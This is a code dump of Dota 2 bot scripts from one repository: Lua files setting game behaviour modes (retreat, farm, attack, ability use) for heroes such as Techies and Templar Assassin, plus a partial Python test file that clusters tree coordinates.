"blob_id": "9fcc3040bad0597b34d67255b0ac0d6dc2d7dcc5",
"content_id": "e998b167c77fd200cd1015fac3abfbc804ac7871",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Lua",
"length_bytes": 92,
"license_type": "no_license",
"max_line_length": 47,
"num_lines": 4,
"path": "/mode_defend_tower_bottom.lua",
"repo_name": "vpus/vpesports-enhanced-bot",
"src_encoding": "UTF-8",
"text": "require( GetScriptDirectory()..\"/UtilityData\");\nfunction GetDesire()\n\treturn desires[0];\nend"
},
{
"alpha_fraction": 0.6850783228874207,
"alphanum_fraction": 0.7040395736694336,
"avg_line_length": 31.34666633605957,
"blob_id": "c390a568037052b0f1fd40f8bd599ed6d5fdd637",
"content_id": "35307939f681b6f9173ede22e4e5fbec85d0d745",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Lua",
"length_bytes": 2426,
"license_type": "no_license",
"max_line_length": 100,
"num_lines": 75,
"path": "/mode_retreat_techies.lua",
"repo_name": "vpus/vpesports-enhanced-bot",
"src_encoding": "UTF-8",
"text": "require( GetScriptDirectory()..\"/UtilityData\")\nrequire( GetScriptDirectory()..\"/UtilityFunctions\")\n\nlocal npcBot = GetBot()\n\nfunction OnStart()\n\tnpcBot:Action_ClearActions(true)\nend\n\nfunction Think()\n\tlocal fountain = GetShopLocation(GetTeam(), SHOP_HOME)\n\tlocal missile = npcBot:GetAbilityByName(\"tinker_heat_seeking_missile\")\n\tlocal enemies = npcBot:GetNearbyHeroes(1600, true, BOT_MODE_NONE)\n\tlocal action = npcBot:GetCurrentActionType()\n\t\n\tif GetUnitToLocationDistance(npcBot, fountain) > 100 and action ~= BOT_ACTION_TYPE_USE_ABILITY then\n\t\tnpcBot:Action_MoveToLocation(fountain)\n\tend\nend\n\nfunction GetDesire()\n\tlocal nearbyEnemies = npcBot:GetNearbyHeroes(1600, true, BOT_MODE_NONE)\n\tlocal closerEnemies = npcBot:GetNearbyHeroes(900, true, BOT_MODE_NONE)\n\tlocal nearbyAllies = npcBot:GetNearbyHeroes(1000, false, BOT_MODE_NONE)\n\tlocal nearbyTowers = npcBot:GetNearbyTowers(1000, true)\n\tlocal nearbyCreeps = npcBot:GetNearbyCreeps(150, true)\n\tlocal allyCreeps = npcBot:GetNearbyCreeps(1600, false)\n\tlocal action = npcBot:GetCurrentActionType()\n\tlocal damagedByCreep = npcBot:WasRecentlyDamagedByCreep(1)\n\tlocal damagedByHero = npcBot:WasRecentlyDamagedByCreep(1)\n\tlocal botCurrentHP = npcBot:GetHealth()\n\tlocal botMaxHP = npcBot:GetMaxHealth()\n\tlocal botLoc = npcBot:GetLocation()\n\t\n\tif npcBot:IsChanneling() then\n\t\treturn _G.desires[0]\n\tend\n\t\n\tif npcBot.other_mode == BOT_MODE_ROAM then\n\t\tif table.getn(nearbyEnemies) > 0 then\n\t\t\treturn _G.desires[7]\n\t\telse\n\t\t\treturn _G.desires[0]\n\t\tend\n\telseif table.getn(closerEnemies) > 2 then\n\t\treturn _G.desires[7]\n\telse\n \tfor e = 1, table.getn(nearbyEnemies) do\n \t\tlocal enemy = nearbyEnemies[e]\n \t\tlocal dist = GetUnitToUnitDistance(npcBot, enemy)\n \t\tlocal enemyTarget = enemy:GetAttackTarget()\n \t\tlocal isTargetted = false\n \t\tlocal enemyRange = enemy:GetAttackRange()\n \t\t\n \t\tif enemyTarget ~= nil then\n \t\t\tisTargetted = enemyTarget:GetUnitName() == npcBot:GetUnitName()\n \t\tend\n \t\t\n \t\tif dist < enemyRange or (dist > enemyRange and isTargetted) then\n \t\t\treturn _G.desires[7]\n \t\tend\n \tend\n \t\n \tif (botCurrentHP/botMaxHP < 0.2 and not npcBot:IsChanneling())\n \tor (damagedByCreep and #nearbyCreeps > 3) then\n \t\n \t\treturn _G.desires[7]\n \tend\n \t\n \tif table.getn(nearbyTowers) > 0 then\n \t\treturn _G.desires[7]\n \tend\n\tend\n\treturn _G.desires[0]\nend\n"
},
{
"alpha_fraction": 0.6517121195793152,
"alphanum_fraction": 0.6707562804222107,
"avg_line_length": 27.149484634399414,
"blob_id": "a15d35c34b607e37e04d06962aee1542269ea506",
"content_id": "2e3465f35ad42ec23d5c935837db602aea470315",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Lua",
"length_bytes": 5461,
"license_type": "no_license",
"max_line_length": 157,
"num_lines": 194,
"path": "/mode_farm_techies.lua",
"repo_name": "vpus/vpesports-enhanced-bot",
"src_encoding": "UTF-8",
"text": "require( GetScriptDirectory()..\"/UtilityData\")\nrequire( GetScriptDirectory()..\"/UtilityFunctions\")\n\nlocal mode_names = {\n\t[0] = \"Early Mining\",\n\t[1] = \"Early Stacking\",\n\t[2] = \"Consider Camp\",\n\t[3] = \"Attack Camp\"\n}\n\nlocal npcBot = GetBot()\nlocal botTeam = GetTeam()\nlocal mode = CONSIDER_CAMP\n\nlocal doneProx = false\nlocal currentAction = 0\nlocal currentStackAction = 0\nlocal radCamps = _G.radiant_camp_locs\nlocal dirCamps = _G.dire_camp_locs\n\nlocal closestCamp = nil\nlocal spawnerLocs = {}\n\nfunction OnStart()\n\tnpcBot.other_mode = BOT_MODE_FARM\n\tnpcBot:Action_ClearActions(true)\nend\n\nfunction GetDesire()\n\tlocal gameTime = DotaTime()\n\tlocal botLevel = npcBot:GetLevel()\n\n\tif botLevel >= 10 then\n\t\treturn _G.desires[5]\n\telse\n\t\treturn _G.desires[2]\n\tend\nend\n\n-- This is the sequence of Techies attacking a neutral camp:\n-- 1: if at camp location, plant a mine in front of camp\n-- 2: attack a neutral once\n-- 3: run away from camp a bit\n-- 4: return to camp location\nfunction attackNeutralSequence(ability, closestCamp)\n\tlocal botDistanceFromCamp = getDistanceBetweenTwoPoints(npcBot:GetLocation(), closestCamp[2])\n\tlocal nearbyNeutrals = npcBot:GetNearbyNeutralCreeps(1000)\n\tlocal action = npcBot:GetCurrentActionType()\n\tlocal botLoc = npcBot:GetLocation()\n\tlocal queue = npcBot:NumQueuedActions()\n\tlocal manaCost = ability:GetManaCost()\n\tlocal botMana = npcBot:GetMana()\n\t\n\tif #nearbyNeutrals > 0 then \n\t\tif currentAction == 0 and ability:IsFullyCastable() and queue == 0 then \n\t\t\tif ability:IsFullyCastable() then \n\t\t\t\tif botDistanceFromCamp < 200 then \n\t\t\t\t\tprint(\" PROXIMITY mine at neutral camp\")\n\t\t\t\t\tnpcBot:Action_UseAbilityOnLocation(ability, closestCamp[2] + RandomVector(20))\n\t\t\t\telseif action ~= _G.actions[\"move\"] and action ~= _G.actions[\"attack_move\"] then\n\t\t\t\t\tnpcBot:ActionPush_MoveToLocation(closestCamp[2])\n\t\t\t\tend\n\t\t\tend\n\t\t\tcurrentAction = 1\n\t\telseif currentAction == 1 and queue == 0 then\n\t\t\tprint(\" ATTACKING neutrals at camp\")\n\t\t\tnpcBot:ActionQueue_AttackUnit(nearbyNeutrals[1], true)\n\t\t\tcurrentAction = 2\n\t\telseif currentAction == 2 and queue == 0 then\n\t\t\tprint(\" MOVING away to kite neutrals\")\n\t\t\tnpcBot:ActionQueue_MoveToLocation(closestCamp[4])\n\t\t\tcurrentAction = 3\n\t\telseif currentAction == 3 and queue == 0 then\n\t\t\tprint(\" MOVING back to neutral camp\")\n\t\t\tnpcBot:ActionQueue_MoveToLocation(closestCamp[2])\n\t\t\tcurrentAction = 0\n\t\tend\n\telseif botDistanceFromCamp > 200 and currentAction ~= 2 and currentAction ~= 3 and action ~= _G.actions[\"move\"] and action ~= _G.actions[\"attack_move\"] then\n\t\tnpcBot:ActionPush_MoveToLocation(closestCamp[2])\n\tend\nend\n\n-- Set the given camp to killed\nfunction setKilledCamp(resetCamp, team)\n\tif team == TEAM_RADIANT then\n\t\tfor i, camp in pairs(radCamps) do\n\t\t\tif resetCamp[1] == camp[1] then\n\t\t\t\tcamp[5] = true\n\t\t\tend\n\t\tend\n\telse\n\t\tfor i, camp in pairs(dirCamps) do\n\t\t\tif resetCamp[1] == camp[1] then\n\t\t\t\tcamp[5] = true\n\t\t\tend\n\t\tend\n\tend\nend\n\n-- Get the next nearest camp that hasn't been killed, appropriate to level\nfunction getClosestCamp(level)\n\tlocal botLoc = npcBot:GetLocation()\n\tlocal closestDist = 100000\n\tlocal closestCamp = nil\n\n\tif level <= 6 then\n\t\t-- attack easy and medium camps\n\t\tif botTeam == _G.teams[1] then\n\t\t\tif radCamps[1][5] then\n\t\t\t\tfor _, camp in pairs(radCamps) 
do\n\t\t\t\t\tif not camp[5] then\n\t\t\t\t\t\tif camp[3] == 1 or camp[3] == 2 then\n\t\t\t\t\t\t\tlocal dist = getDistanceBetweenTwoPoints(botLoc, camp[1])\n\t\t\t\t\t\t\tif dist < closestDist then\n\t\t\t\t\t\t\t\tclosestDist = dist\n\t\t\t\t\t\t\t\tclosestCamp = camp\n\t\t\t\t\t\t\t\tprint(\"DISTANCE FROM CAMP = \"..dist)\n\t\t\t\t\t\t\tend\n\t\t\t\t\t\tend\n\t\t\t\t\tend\n\t\t\t\tend\n\t\t\t\tif closestCamp ~= nil then\n\t\t\t\t\tprint(\"CLOSEST CAMP CHOSEN = \"..closestCamp[1][1]..\",\"..closestCamp[1][2])\n\t\t\t\telse\n\t\t\t\t\tprint(\"ALL CAMPS ARE DESTROYED!!!!!!!!\")\n\t\t\t\tend\n\t\t\telse\n\t\t\t\tclosestCamp = radCamps[1]\n\t\t\tend\n\t\t\treturn closestCamp\n\t\telse\n\t\t\tfor _, camp in pairs(dirCamps) do\n\t\t\t\tif not camp[5] then\n\t\t\t\t\tif camp[3] == 1 or camp[3] == 2 then\n\t\t\t\t\t\tlocal dist = getDistanceBetweenTwoPoints(botLoc, camp[1])\n\t\t\t\t\t\tif dist < closestDist then\n\t\t\t\t\t\t\tclosestDist = dist\n\t\t\t\t\t\t\tclosestCamp = camp\n\t\t\t\t\t\tend\n\t\t\t\t\tend\n\t\t\t\tend\n\t\t\tend\n\t\t\treturn closestCamp\n\t\tend\n\telseif level > 6 then\n\t\t-- attack medium, hard and ancient\n\t\tif botTeam == _G.teams[1] then\n\t\t\tfor _, camp in pairs(radCamps) do\n\t\t\t\tif not camp[5] then\n\t\t\t\t\tif camp[3] == 2 or camp[3] == 3 then\n\t\t\t\t\t\tlocal dist = getDistanceBetweenTwoPoints(botLoc, camp[1])\n\t\t\t\t\t\tif dist < closestDist then\n\t\t\t\t\t\t\tclosestDist = dist\n\t\t\t\t\t\t\tclosestCamp = camp\n\t\t\t\t\t\t\tprint(\"DISTANCE FROM CAMP = \"..dist)\n\t\t\t\t\t\tend\n\t\t\t\t\tend\n\t\t\t\tend\n\t\t\t\tif closestCamp ~= nil then\n\t\t\t\t\tprint(\"CLOSEST CAMP CHOSEN = \"..closestCamp[1][1]..\",\"..closestCamp[1][2])\n\t\t\t\telse\n\t\t\t\t\tprint(\"ALL CAMPS ARE DESTROYED!!!!!!!!\")\n\t\t\t\tend\n\t\t\tend\n\t\t\treturn closestCamp\n\t\telse\n\t\t\tfor _, camp in pairs(dirCamps) do\n\t\t\t\tif not camp[5] then\n\t\t\t\t\tif camp[3] == 2 or camp[3] == 3 then\n\t\t\t\t\t\tlocal dist = getDistanceBetweenTwoPoints(botLoc, camp[1])\n\t\t\t\t\t\tif dist < closestDist then\n\t\t\t\t\t\t\tclosestDist = dist\n\t\t\t\t\t\t\tclosestCamp = camp\n\t\t\t\t\t\tend\n\t\t\t\t\tend\n\t\t\t\tend\n\t\t\tend\n\t\t\treturn closestCamp\n\t\tend\n\tend\nend\n\nfunction minePlaced(vecLoc)\n\tlocal unitList = GetUnitList(UNIT_LIST_ALLIES)\n\tfor unit = 1, table.getn(unitList) do\n\t\tlocal mine = unitList[unit] \n\t\tif mine:GetUnitName() == \"npc_dota_techies_land_mine\" then\n\t\t\tif mine:GetLocation()[1] == vecLoc[1] and mine:GetLocation()[2] == vecLoc[2] then\n\t\t\t\treturn true\n\t\t\tend\n\t\tend\n\tend\n\treturn false\nend\n"
},
{
"alpha_fraction": 0.626336395740509,
"alphanum_fraction": 0.6425032615661621,
"avg_line_length": 43.08045959472656,
"blob_id": "9eacf8a2c1c9baa22c0a76e4239ae8e95bef8eb3",
"content_id": "a90acc042c7f60c21ca25811c1c982be567006dd",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Lua",
"length_bytes": 3835,
"license_type": "no_license",
"max_line_length": 138,
"num_lines": 87,
"path": "/mode_attack_techies.lua",
"repo_name": "vpus/vpesports-enhanced-bot",
"src_encoding": "UTF-8",
"text": "require( GetScriptDirectory()..\"/UtilityData\");\nrequire( GetScriptDirectory()..\"/UtilityFunctions\");\n----------------------------------------------------------------------------------------------------\n\nlocal npcBot = GetBot();\n\nfunction OnStart()\n\tnpcBot.other_mode = BOT_MODE_ATTACK\n npcBot:Action_ClearActions(true);\nend\n\n-- Logic for all Attack Mode behavior\n--function Think()\n-- -- Abilities\n-- local ProximityMine = npcBot:GetAbilityByName(\"techies_land_mines\");\n-- local StasisTrap = npcBot:GetAbilityByName(\"techies_stasis_trap\");\n-- local BlastOff = npcBot:GetAbilityByName(\"techies_suicide\");\n-- local RemoteMine = npcBot:GetAbilityByName(\"techies_remote_mines\");\n--\n-- local nearbyEnemies = npcBot:GetNearbyHeroes(1000, true, BOT_MODE_NONE);\n-- local nearbyAllies = npcBot:GetNearbyHeroes(1000, false, BOT_MODE_NONE);\n-- local botLoc = npcBot:GetLocation();\n--\n-- local botHP = npcBot:GetHealth();\n-- local botMaxHP = npcBot:GetMaxHealth();\n-- local botMana = npcBot:GetMana();\n--\n-- -- Make sure allies are around to assist the fight\n-- if #nearbyEnemies > 0 and #nearbyAllies > 0 then\n-- local enemyLoc = nearbyEnemies[1]:GetLocation();\n-- local distToEnemy = _G.getDistanceBetweenTwoPoints(enemyLoc, botLoc);\n-- local aoeLoc = npcBot:FindAoELocation(true, true, enemyLoc, 400, 1000, 0, 600);\n--\n-- if BlastOff:IsFullyCastable() and aoeLoc.count > 0 and (botHP / botMaxHP) > 0.5 then\n-- local nearbyTowers = npcBot:GetNearbyTowers(1000, true);\n-- if #nearbyTowers > 0 then\n-- local aoeDistToTower = _G.getDistanceBetweenTwoPoints(botLoc, nearbyTowers[1]);\n-- if aoeDistToTower > 700 then\n-- npcBot:ActionPush_UseAbilityOnLocation(BlastOff, aoeLoc.targetloc);\n-- end\n-- else\n-- npcBot:ActionPush_UseAbilityOnLocation(BlastOff, aoeLoc.targetloc);\n-- end\n-- elseif StasisTrap:IsFullyCastable() then\n-- npcBot:ActionPush_UseAbilityOnLocation(StasisTrap, botLoc + RandomVector(50));\n-- elseif RemoteMine:IsFullyCastable() then\n-- npcBot:ActionPush_UseAbilityOnLocation(RemoteMine, enemyLoc + RandomVector(50));\n-- elseif ProximityMine:IsFullyCastable() then\n-- npcBot:ActionPush_UseAbilityOnLocation(ProximityMine, botLoc + RandomVector(100));\n-- elseif npcBot:GetCurrentActionType() ~= _G.actions[\"attack\"] and npcBot:GetCurrentActionType() ~= _G.actions[\"attack_move\"] then\n-- npcBot:Action_AttackUnit(nearbyEnemies[1], false);\n-- end\n-- end\n--end\n\nfunction GetDesire()\n -- Abilities\n local ProximityMine = npcBot:GetAbilityByName(\"techies_land_mines\");\n local StasisTrap = npcBot:GetAbilityByName(\"techies_stasis_trap\");\n local BlastOff = npcBot:GetAbilityByName(\"techies_suicide\");\n local RemoteMine = npcBot:GetAbilityByName(\"techies_remote_mines\");\n\n local nearbyEnemies = npcBot:GetNearbyHeroes(1000, true, BOT_MODE_NONE);\n local nearbyAllies = npcBot:GetNearbyHeroes(1000, false, BOT_MODE_NONE);\n local ratio = #nearbyEnemies / (#nearbyAllies + 1);\n local averageEnemyHP = 0;\n local lowestEnemyHP = 100000;\n local highestEnemyHP = 0;\n\n for _, enemy in pairs(nearbyEnemies) do\n local enemyHP = enemy:GetHealth();\n averageEnemyHP = averageEnemyHP + enemyHP;\n if enemyHP < lowestEnemyHP then\n lowestEnemyHP = enemyHP;\n end\n if enemyHP > highestEnemyHP then\n highestEnemyHP = enemyHP;\n end\n end\n\n if BlastOff:IsFullyCastable() and #nearbyEnemies > 0\n and averageEnemyHP <= BlastOff:GetAbilityDamage() then\n return _G.desires[7];\n end\n \n return _G.desires[0];\nend\n"
},
{
"alpha_fraction": 0.7296072244644165,
"alphanum_fraction": 0.745090663433075,
"avg_line_length": 34.30666732788086,
"blob_id": "e6261896611577a00649e56de0d931735e617ad9",
"content_id": "da5fb4d4858666098bd741ac7b4b7502110147fb",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Lua",
"length_bytes": 2648,
"license_type": "no_license",
"max_line_length": 130,
"num_lines": 75,
"path": "/mode_retreat_templar_assassin.lua",
"repo_name": "vpus/vpesports-enhanced-bot",
"src_encoding": "UTF-8",
"text": "require( GetScriptDirectory()..\"/UtilityData\")\nrequire( GetScriptDirectory()..\"/UtilityFunctions\")\n\nlocal npcBot = GetBot()\nlocal hpThreshold = 0.2\n\nfunction OnStart()\n\tnpcBot:Action_ClearActions(true)\nend\n\n-- When faced with multiple enemies, fall back to a safe location\nfunction Think()\n\tlocal fountain = GetShopLocation(GetTeam(), SHOP_HOME)\n\tlocal enemies = npcBot:GetNearbyHeroes(1600, true, BOT_MODE_NONE)\n\tlocal botHealth = npcBot:GetHealth()\n\tlocal botMaxHealth = npcBot:GetMaxHealth()\n\tlocal botAction = npcBot:GetCurrentActionType()\n\tlocal damagedByCreep = npcBot:WasRecentlyDamagedByCreep(1)\n\tlocal damagedByHero = npcBot:WasRecentlyDamagedByCreep(1)\n\t\n\tlocal bottleLoc = npcBot:FindItemSlot(\"item_bottle\")\n\tlocal salveLoc = npcBot:FindItemSlot(\"item_flask\")\n\tlocal tangoLoc = npcBot:FindItemSlot(\"item_tango\")\n\tlocal portalLoc = npcBot:FindItemSlot(\"item_tpscroll\")\n\t\n\tif botHealth/botMaxHealth <= hpThreshold and GetUnitToLocationDistance(npcBot, fountain) > 100 and not npcBot:IsChanneling() then\n\t\tif bottleLoc ~= ITEM_SLOT_TYPE_MAIN \n\t\tand salveLoc ~= ITEM_SLOT_TYPE_MAIN \n\t\tand tangoLoc ~= ITEM_SLOT_TYPE_MAIN \n\t\tand portalLoc == ITEM_SLOT_TYPE_MAIN then\n\t\t\tnpcBot:Action_UseAbilityOnLocation(npcBot:GetItemInSlot(portalLoc), fountain)\n\t\telse\n\t\t\tnpcBot:Action_MoveToLocation(fountain)\n\t\tend\n\telse\n\t\tnpcBot:Action_MoveToLocation(fountain)\n\tend\nend\n\nfunction GetDesire()\n\tlocal nearbyEnemies = npcBot:GetNearbyHeroes(650, true, BOT_MODE_NONE)\n\tlocal nearbyAllies = npcBot:GetNearbyHeroes(1000, false, BOT_MODE_NONE)\n\tlocal nearbyTowers = npcBot:GetNearbyTowers(1000, true)\n\tlocal nearbyCreeps = npcBot:GetNearbyLaneCreeps(150, true)\n\tlocal currentAction = npcBot:GetCurrentActionType()\n\tlocal damagedByCreep = npcBot:WasRecentlyDamagedByCreep(1)\n\tlocal damagedByHero = npcBot:WasRecentlyDamagedByCreep(1)\n\tlocal botCurrentHP = npcBot:GetHealth()\n\tlocal botMaxHP = npcBot:GetMaxHealth()\n\tlocal botLoc = npcBot:GetLocation()\n\tlocal mode = npcBot:GetActiveMode()\n\t\n\tlocal closerEnemies = npcBot:GetNearbyHeroes(400, true, BOT_MODE_NONE)\n\tlocal fartherEnemies = npcBot:GetNearbyHeroes(800, true, BOT_MODE_NONE)\n\n\tif npcBot.duel then\n\t\treturn _G.desires[1]\n\tend\n\t\n\tif (currentAction ~= BOT_ACTION_TYPE_USE_ABILITY and not npcBot:IsChanneling()) \n\t\tand (#fartherEnemies > 1) \n \tor (#closerEnemies > 0) \n \tor (#nearbyTowers > 0)\n \tor (botCurrentHP/botMaxHP < hpThreshold)\n \tor ((damagedByCreep and #nearbyCreeps > 2) or damagedByHero) then\n \t\n \tif mode == BOT_MODE_ATTACK then\n \t\treturn _G.desires[3]\n \tend\n \t\n\t\treturn _G.desires[6] \n\tend\n\t\n\treturn _G.desires[1]\nend\n"
},
{
"alpha_fraction": 0.7015444040298462,
"alphanum_fraction": 0.7129343748092651,
"avg_line_length": 33.76510238647461,
"blob_id": "82d533c6334f8fe24b2154f18594803493f4a3e3",
"content_id": "ef50883187ca7fd0ad1275c048fddc4167a400da",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Lua",
"length_bytes": 5180,
"license_type": "no_license",
"max_line_length": 126,
"num_lines": 149,
"path": "/ability_item_usage_templar_assassin.lua",
"repo_name": "vpus/vpesports-enhanced-bot",
"src_encoding": "UTF-8",
"text": "local build = require(GetScriptDirectory()..\"/item_build_templar_assassin\")\nrequire(GetScriptDirectory()..\"/UtilityData\")\nrequire(GetScriptDirectory()..\"/UtilityFunctions\")\n\nlocal npcBot = GetBot()\nlocal botTeam = GetTeam()\n\nlocal refraction = npcBot:GetAbilityByName(\"templar_assassin_refraction\")\nlocal meld = npcBot:GetAbilityByName(\"templar_assassin_meld\")\nlocal psi = npcBot:GetAbilityByName(\"templar_assassin_psi_blades\") \nlocal trap = npcBot:GetAbilityByName(\"templar_assassin_trap\")\nlocal psitrap = npcBot:GetAbilityByName(\"templar_assassin_psionic_trap\")\n\nfunction BuybackUsageThink()end\n\nfunction AbilityLevelUpThink()\n\tlocal skillsToLevel = build[\"skills\"]\n\tif npcBot:GetAbilityPoints() > 0 and skillsToLevel[1] ~= nil then\n\t\tnpcBot:ActionImmediate_LevelAbility(skillsToLevel[1])\n\t\ttable.remove(skillsToLevel, 1)\n\tend\nend\n\n-- Logic for all Ability Usage behavior\nfunction AbilityUsageThink()\n\t-- Stats\n\tlocal botMana = npcBot:GetMana()\n\tlocal botMaxMana = npcBot:GetMaxMana()\n\tlocal botHP = npcBot:GetHealth()\n\tlocal botMaxHP = npcBot:GetMaxHealth()\n\tlocal botLevel = npcBot:GetLevel()\n\tlocal mode = npcBot:GetActiveMode()\n\tlocal action = npcBot:GetCurrentActionType()\n\tlocal allyList = GetUnitList(UNIT_LIST_ALLIES)\n\tlocal botMode = npcBot:GetActiveMode()\n\tlocal hpPercent = botHP/botMaxHP\n\n\t-- Nearby Units\n\tlocal allies = npcBot:GetNearbyHeroes(1000, false, BOT_MODE_NONE)\n\tlocal enemies = npcBot:GetNearbyHeroes(1000, true, BOT_MODE_NONE)\n\tlocal enemyCreeps = npcBot:GetNearbyLaneCreeps(1000, true)\n\tlocal allyCreeps = npcBot:GetNearbyLaneCreeps(1000, false)\n\tlocal neutrals = npcBot:GetNearbyNeutralCreeps(1000)\n\t\n\tlocal numAllies = table.getn(allies)\n\tlocal numEnemies = table.getn(enemies)\n\tlocal numEnemyCreeps = table.getn(enemyCreeps)\n\tlocal numAllyCreeps = table.getn(allyCreeps)\n\tlocal numNeutrals = table.getn(neutrals)\n\t\n\tlocal damagedByHero = npcBot:WasRecentlyDamagedByAnyHero(1)\n\tlocal damagedByCreep = npcBot:WasRecentlyDamagedByCreep(1)\n\n\t-- PSIONIC TRAP Usage\n\tif mode == BOT_MODE_ATTACK and psitrap:IsFullyCastable() and action ~= BOT_ACTION_TYPE_USE_ABILITY then\n\t\t-- Make sure you're not overriding traps if you don't want to\n\t\tif table.getn(npcBot.traps) ~= (npcBot.max_traps * psitrap:GetLevel()) then\n\t\t\t\n\t\t\n\t\telseif mode == BOT_MODE_ATTACK then -- Override traps if needed\n\t\t\tlocal target = npcBot:GetAttackTarget()\n\t\t\t\n\t\t\tif target ~= nil then\n\t\t\t\tlocal targetDist = GetUnitToUnitDistance(npcBot, target)\n\t\t\t\t\n\t\t\t\tif targetDist < 100 and not npcBot:HasModifier(\"modifier_templar_assassin_meld\") and action ~= BOT_ACTION_TYPE_ATTACK then\n\t\t\t\t\tlocal trapLoc = target:GetExtrapolatedLocation(0.5)\n\t\t\t\t\t\n\t\t\t\t\tnpcBot:Action_UseAbilityOnLocation(psitrap, trapLoc)\n\t\t\t\tend\n\t\t\tend\n\t\tend\n\tend\n\t\n\t-- REFRACTION Usage\n\tif action ~= BOT_ACTION_TYPE_USE_ABILITY and not npcBot:HasModifier(\"modifier_templar_assassin_refraction_absorb\") then\n\t\tif damagedByHero or damagedByCreep and hpPercent < 0.5 then\n\t\t\tnpcBot:Action_UseAbility(refraction)\n\t\tend\n\tend\n\t\n\t-- MELD, REFRACTION, and BLINK attacking\n\tif mode == BOT_MODE_ATTACK and action ~= BOT_ACTION_TYPE_USE_ABILITY then\n\t\tif not npcBot:HasModifier(\"modifier_templar_assassin_refraction_absorb\") then\n\t\t\tif refraction:IsFullyCastable() then\n\t\t\t\tnpcBot:Action_UseAbility(refraction)\n\t\t\tend\n\t\telseif meld:IsFullyCastable() 
then\n\t\t\tlocal target = npcBot:GetAttackTarget()\n\t\t\t\n\t\t\tif target ~= nil then\n\t\t\t\tlocal targetDist = GetUnitToUnitDistance(target, npcBot)\n\t\t\t\t\n\t\t\t\tif targetDist > 100 then\n \t\t\t\tlocal available, blink = _G.getItemAvailable(\"item_blink\", npcBot)\n \t\t\t\t\n \t\t\t\tif available and blink:IsFullyCastable() then\n \t\t\t\t\tnpcBot:Action_UseAbilityOnLocation(blink, target:GetLocation() + RandomVector(50))\n \t\t\t\telse\n \t\t\t\t\tnpcBot:Action_MoveToLocation(target:GetLocation() + RandomVector(20))\n \t\t\t\tend\n\t\t\t\telse\n\t\t\t\t\tif not npcBot:HasModifier(\"modifier_templar_assassin_meld\") and meld:IsFullyCastable() then\n\t\t\t\t\t\tnpcBot:Action_UseAbility(meld)\n\t\t\t\t\telse\n\t\t\t\t\t\tnpcBot:Action_AttackUnit(target, true)\n\t\t\t\t\tend\n\t\t\t\tend\n\t\t\tend\n\t\telse\n\t\t\t\n\t\tend\n\tend\nend\n\nfunction useSoulRing()\n\tlocal botMana = npcBot:GetMana()\n\tlocal botHP = npcBot:GetHealth()\n\t-- SOUL RING Usage\n local soulLoc = npcBot:FindItemSlot(\"item_soul_ring\")\n local soul = nil\n if npcBot:GetItemSlotType(soulLoc) == ITEM_SLOT_TYPE_MAIN then\n soul = npcBot:GetItemInSlot(soulLoc)\n end\n if soul ~= nil then\n if soul:IsFullyCastable() and botMana < 200 and botHP > 400 then\n npcBot:Action_UseAbility(soul)\n end\n end\nend\n\nfunction getArmorMultiplier(armor)\n\treturn 1 - (0.05 * armor / (1 + 0.05 * math.abs(armor)))\nend\n\nfunction BuybackUsageThink()\n if DotaTime() < -30 and lane_claim then\n local lane_id = npcBot:GetAssignedLane()\n if lane_id == 1 then\n npcBot:ActionImmediate_Chat(\"I'm going Top!\", false)\n elseif lane_id == 2 then\n npcBot:ActionImmediate_Chat(\"I'm going Mid!\", false)\n elseif lane_id == 3 then\n npcBot:ActionImmediate_Chat(\"I'm going Bot!\", false)\n end\n lane_claim = false\n end\n return\nend\n"
},
{
"alpha_fraction": 0.7655172348022461,
"alphanum_fraction": 0.7724137902259827,
"avg_line_length": 23.16666603088379,
"blob_id": "925cdaa2e69604443410a743d8113f94500ea317",
"content_id": "5f1693a2c2c87534764a99ffeeb602498f3ae7f6",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Lua",
"length_bytes": 145,
"license_type": "no_license",
"max_line_length": 50,
"num_lines": 6,
"path": "/mode_side_shop_legion_commander.lua",
"repo_name": "vpus/vpesports-enhanced-bot",
"src_encoding": "UTF-8",
"text": "require(GetScriptDirectory()..\"/UtilityData\")\nrequire(GetScriptDirectory()..\"/UtilityFunctions\")\n\nfunction GetDesire()\n\treturn _G.desires[1]\nend\n"
},
{
"alpha_fraction": 0.3698156774044037,
"alphanum_fraction": 0.447388619184494,
"avg_line_length": 24,
"blob_id": "f60953ca44c9f4e8e4058d2d4bcacad10cb77940",
"content_id": "bbf4db44326a2946e539d6d3ca77542d43b07712",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2604,
"license_type": "no_license",
"max_line_length": 118,
"num_lines": 104,
"path": "/other/test.py",
"repo_name": "vpus/vpesports-enhanced-bot",
"src_encoding": "UTF-8",
"text": "import time\n\ndef getDistance(p1, p2):\n return ((p1[0] - p2[0])*(p1[0] - p2[0]) + (p1[1] - p2[1])*(p1[1] - p2[1]))**(1/2)\n\ndef samePoint(p1, p2):\n return p1[0] == p2[0] and p1[1] == p2[1]\n\ndef inGroup(group, point):\n for p in group:\n if p[0] == point[0] and p[1] == point[1]:\n return True\n \n return False\n\ntrees = [\n [400,550],\n [420,530],\n [300,450],\n [350,420],\n [475,500],\n [375,475],\n [325,520],\n [330,620],\n [450,425],\n [900,800],\n [920,850],\n [935,750],\n [950,775],\n [975,800],\n [850,700],\n [835,750],\n [900,700],\n [950,715],\n [850,850],\n [1200, 200]\n]\n\n# go through each point and check against every other point to see if the distance is close enough, if yes, group them\n\n# for _ in range(0, 60):\n# for point1 in trees:\n# group = [point1]\n# for point2 in trees:\n# dist = getDistance(point1, point2)\n# \n# if dist < 100 and not inGroup(group, point2):\n# group.append(point2)\n# for point3 in trees:\n# dist2 = getDistance(point2, point3)\n# \n# if dist2 < 100 and not inGroup(group, point3):\n# group.append(point3)\n# groups.append(group)\n# print(time.time() - start)\n\n# for group in groups:\n# for point in group:\n# print(str(point[0]) + \", \" + str(point[1]))\n# print(\"-------------------------\")\n\ndef cluster(points):\n clusters = []\n \n while points:\n s = []\n queue = [points.pop()]\n while queue:\n tempQueue = []\n for p1 in queue:\n for p2 in points:\n if not samePoint(p1, p2):\n dist = getDistance(p1, p2)\n \n if dist < 100:\n tempQueue.append(p2)\n \n for p1 in queue:\n if not inGroup(s, p1):\n s.append(p1)\n \n queue = tempQueue;\n 